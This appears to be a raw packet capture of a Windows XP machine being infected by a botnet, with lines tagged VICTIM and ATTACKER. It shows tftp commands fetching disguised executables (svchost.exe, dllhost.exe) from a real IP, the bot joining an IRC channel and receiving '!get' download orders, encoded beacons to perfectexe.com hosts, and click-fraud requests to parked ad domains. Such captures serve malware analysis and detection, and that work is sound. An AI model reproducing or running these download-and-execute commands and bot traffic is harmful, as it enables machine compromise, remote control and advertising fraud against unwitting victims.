VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32>
VICTIM: tftp -i 98.190.183.102 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 98.190.183.102 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 2 seconds, 9984 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK ozwawqgoUSER z020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG ozwawqgo :!get http:/88.perfectexe.com:88/kp.jpg:u. PRIVMSG ozwawqgo :!get http:/kakgezaebalsha.com/ml2.txt
VICTIM: GET /kp.jpg HTTP/1.0User-Agent: DownloadHost: 88.perfectexe.com:88Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3A69C1DCEDCA8E5FE4F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.9026758 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /ck.jpg?t=0.6914942 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 88.perfectexe.com:88Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=8D93B65251C1EE71BFA585A8F7BB06C19C3CBF85125D910D9FFE044D993E406F0941A14B6F2FF4DF84EEA9C32E24769107FF47FE234E6939F99D522899EE7DE3991922545B89E47B9DA7A3D9749A0AD519EEA79A39478187A30181EC8A7D3ABFB5E5CFC2547BFB5452E197105A5A0D97ED1A96B93671351286DFD4BB9A2CE65816107CDBDCEDB5732D1EEBBAB27B0D8F&t=0.4057276 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-DB-13-FE&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck.perfectexe.com:89
ATTACKER: GET /sn.php?c=958B6B8FD84835AAE5FF6C41400CFC3BD0702F15B0FFC75B6203DC95BB1CA689FFB79B7102428EA5543EB1DBBDB7A1468D75EC5597FAB0E0C9AD4238BFC8FF61CB4BB5C33CEE48D7F2C87903806E02DD6B9C5964413FE2E4A507573A8473A3260555939EFBD403ACDC6F6EF890690E869663EEB042119EAC33276411309223D9FBEB4DE8F3C7A0686E58772731F4F68B7BA4&t=0.3045313 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: HTTP/1.1 200 OKConnection: closeDate: Wed, 13 Apr 2011 19:26:53 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETContent-Length: 1382Content-Type: text/htmlSet-Cookie: ASPSESSIONIDAASBTTTT=INBMJMECIHPAIGOBMNFIGCCA; path=/Cache-control: privatehttp:/drugcuring.com301CLICKRND5NOSCRIPThttp:/modeljob.us 301CLICKRND5NOSCRIPThttp:/agentfurniture.com301CLICKRND5NOSCRIPThttp:/politicsaudio.com301CLICKRND5NOSCRIPThttp:/japaneseaffair.com301CLICKRND6NOSCRIPThttp:/mysafedating.com603CLICK/search/{|||}epl={|||}yt={|||}qsRND6NOSCRIPTCLICKforward302.aspx{|||}clickRND6NOSCRIPTCLICKRND5NOSCRIPThttp:/offshoreventures.com301CLICKRND5NOSCRIPThttp:/franchiseerotic.info603CLICKindex.php?pt=1{|||}result.php?{|||}.htm?dmn={|||}?epl={|||}search.php?{|||}index.php?Keywords={|||}click.php?{|||}htm?da={|||}/redirect?RND6NOSCRIPTCLICKindex.php?pt=3{|||}click.php?{|||}cfwd?dq={|||}click?epl={|||}redirect.php?RND6NOSCRIPTCLICKRND5NOSCRIPThttp:/equestrianisms.com301CLICKRND5NOSCRIPThttp:/paymecredit.com301CLICKRND6NOSCRIPThttp:/frontalpain.info301CLICK
ATTACKER: RND5NOSCRIPThttp:/insuranceformedicalcares.info301CLICKRND5NOSCRIPThttp:/nickserv.com301CLICKRND5NOSCRIPT
ATTACKER: GET /s5.jpg?t=0.6278345 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 88.perfectexe.com:88Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=627C27C34FDF9E36CAD2ADF4C1B68270B92E5462AF8F4CDADEECA0E9E04ABA94CD875EB33B0127144A70DBB02D115D44C53253B94B3FACFE2119ACDB39943853B9F664CCCA1E9708A59FC8B268869C4339CE6855B7C96D6BCF6DC7AA7582DC59C797575AA48BF45BCB78A423ECECD14B58AFCFE03B7CB5927A233E51AE1859E7D7DB9237B49A8149EEDBD98C70B3D357&t=0.8616602 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /g.php HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; waoc)Host: s5.perfectexe.com:88Pragma: no-cache
ATTACKER: GET /sn.php?c=5F4147A332A27BD3B5AD356CDFA855A7C5526D5B3F1F57C19BA99AD3E9430B25A7ED41ACD7EDD6E5C8F28FE4162ADCC5AA5D55BFC2B61E4C526A5126329FE58EF7B8AF0770A464FB142ECFB5EC029946BB4C4974710F74722C8E2F4257A03BBEA6F6919CFBD42D827DCE47D16C9565ED6D98EAB4673402302E3A24518624857F48582A8DB4857ABD291186D7E4225BD97595&t=0.8052027 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET / HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: drugcuring.comConnection: Keep-Alive
ATTACKER: HTTP/1.1 200 OKCache-Control: privateContent-Length: 22410Content-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319p3p: CP=\CAO PSA OUR\Set-Cookie: SessionID=32ece26c-4558-44d2-89c2-fa1704801f8a; path=/Set-Cookie: VisitorID=a5e6fc00-fbdc-471f-8b24-bc6d7334c8ff&Exp=4/13/2014 12:27:28 PM; expires=Sun, 13-Apr-2014 19:27:28 GMT; path=/X-Powered-By: ASP.NETDate: Wed, 13 Apr 2011 19:27:28 GMTConnection: keep-aliveCash Advance | Debt Consolidation | Insurance | Free Credit Report | Cell Phones at Drugcuring.com
ATTACKER: GET /js/json.js?rte=1&tm=2&dn=drugcuring.com&tid=516 HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: drugcuring.comConnection: Keep-AliveCookie: SessionID=32ece26c-4558-44d2-89c2-fa1704801f8a; VisitorID=a5e6fc00-fbdc-471f-8b24-bc6d7334c8ff&Exp=4/13/2014 12:27:28 PM
ATTACKER: HTTP/1.1 200 OKCache-Control: privateContent-Length: 6769Content-Type: text/javascript; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 13 Apr 2011 19:27:28 GMTConnection: keep-aliveif (!this.JSON) { this.JSON = {};}(function() { function f(n) { return n < 10 ? '0' + n : n; } if (typeof Date.prototype.toJSON !== 'function') { Date.prototype.toJSON = function(key) { return isFinite(this.valueOf()) ? this.getUTCFullYear() + '-' + f(this.getUTCMonth() + 1) + '-' + f(this.getUTCDate()) + 'T' + f(this.getUTCHours()) + ':' + f(this.getUTCMinutes()) + ':' + f(this.getUTCSeconds()) + 'Z' : null; }; String.prototype.toJSON = Number.prototype.toJSON = Boolean.prototype.toJSON = function(key) { return this.valueOf(); }; } var cx = /[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g, escapable = /[\\\\\\\\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g, gap, indent, meta = { '\\b': '\\\\b', '\\t': '\\\\t', '\': '\\\', '\\f': '\\\\f',
ATTACKER: '\': '\\\', '\': '\\\\\', '\\\\': '\\\\\\\\' }, rep; function quote(string) { escapable.lastIndex = 0; return escapable.test(string) ? '\' + string.replace(escapable, function(a) { var c = meta[a]; return typeof c === 'string' ? c : '\\\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4); }) + '\' : '\' + string + '\'; } function str(key, holder) { var i, k, v, length, mind = gap, partial, value = holder[key]; if (value && typeof value === 'object' && typeof value.toJSON === 'function') { value = value.toJSON(key); } if (typeof rep === 'function') { value = rep.call(holder, key, value); } switch (typeof value) { case 'string': return quote(value); case 'number': return isFinite(value) ? String(value) : 'null'; case 'boolean': case 'null': return String(value); case 'object': if (!value) { return 'null'; } gap += indent; partial = []; if (Object.
ATTACKER: prototype.toString.apply(value) === '[object Array]') { length = value.length; for (i = 0; i < length; i += 1) { partial[i] = str(i, value) || 'null'; } v = partial.length === 0 ? '[]' : gap ? '[\' + gap + partial.join(',\' + gap) + '\' + mind + ']' : '[' + partial.join(',') + ']'; gap = mind; return v; } if (rep && typeof rep === 'object') { length = rep.length; for (i = 0; i < length; i += 1) { k = rep[i]; if (typeof k === 'string') { v = str(k, value); if (v) { partial.push(quote(k) + (gap ? ': ' : ':') + v); } } } } else { for (k in value) { if (Object.hasOwnProperty.call(value, k)) { v = str(k, value); if (v) { partial.push(quote(k) + (gap ? ': ' : ':') + v); } }
ATTACKER: } } v = partial.length === 0 ? '{}' : gap ? '{\' + gap + partial.join(',\' + gap) + '\' + mind + '}' : '{' + partial.join(',') + '}'; gap = mind; return v; } } if (typeof JSON.stringify !== 'function') { JSON.stringify = function(value, replacer, space) { var i; gap = ''; indent = ''; if (typeof space === 'number') { for (i = 0; i < space; i += 1) { indent += ' '; } } else if (typeof space === 'string') { indent = space; } rep = replacer; if (replacer && typeof replacer !== 'function' && (typeof replacer !== 'object' || typeof replacer.length !== 'number')) { throw new Error('JSON.stringify'); } return str('', { '': value }); }; } if (typeof JSON.parse !== 'function') { JSON.parse = function(text, reviver) { var j; function walk(holder, key) { var k, v, value = holder[key]; if (value && typeof value === 'object') { for (k in value) { if (Object.hasOwnProperty.call(value, k)) {
ATTACKER: v = walk(value, k); if (v !== undefined) { value[k] = v; } else { delete value[k]; } } } } return reviver.call(holder, key, value); } text = String(text); cx.lastIndex = 0; if (cx.test(text)) { text = text.replace(cx, function(a) { return '\\\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4); }); } if (/^[\\],:{}\\s]*\$/.test(text.replace(/\\\\(?:[\\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@').replace(/\[^\\\\\\\]*\|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g, ']').replace(/(?:^|:|,)(?:\\s*\\[)+/g, ''))) { j = eval('(' + text + ')'); return typeof reviver === 'function' ? walk({ '': j }, '') : j; } throw new SyntaxError('JSON.parse'); }; }} ());
ATTACKER: GET /css/style.css?rte=1&tm=2&dn=drugcuring.com&tid=516&def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontC
VICTIM: olor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8 HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: drugcuring.comConnection: Keep-AliveCookie: SessionID=32ece26c-4558-44d2-89c2-fa1704801f8a; VisitorID=a5e6fc00-fbdc-471f-8b24-bc6d7334c8ff&Exp=4/13/2014 12:27:28 PM
ATTACKER: GET /images/template/360x318/ist2_746781_female_student.jpg HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: i.nuseek.comConnection: Keep-Alive
ATTACKER: GET /images/misc/blank.gif HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: i.nuseek.comConnection: Keep-Alive
ATTACKER: GET /images/Themes/T101/buttons/0006.gif HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: i.nuseek.comConnection: Keep-Alive
ATTACKER: GET /apps/domainpark/show_afd_ads.js HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: pagead2.googlesyndication.comConnection: Keep-Alive
ATTACKER: GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-demandmedia-radlinks&domain_name=drugcuring.com&s=drugcuring.com&adsafe=medium&num_radlinks=15&dt=1199985758311&u_tz=-480&u_his=0&u_h=600&u_w=800&frm=0&aref=undefined HTTP/1.0Accept: */*Referer: http:/drugcuring.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: googleads.g.doubleclick.netConnection: Keep-Alive
ATTACKER: GET / HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: modeljob.usConnection: Keep-Alive
ATTACKER: GET /?o_id=62461&domainname=modeljob.us HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: searchportal.information.comConnection: Keep-Alive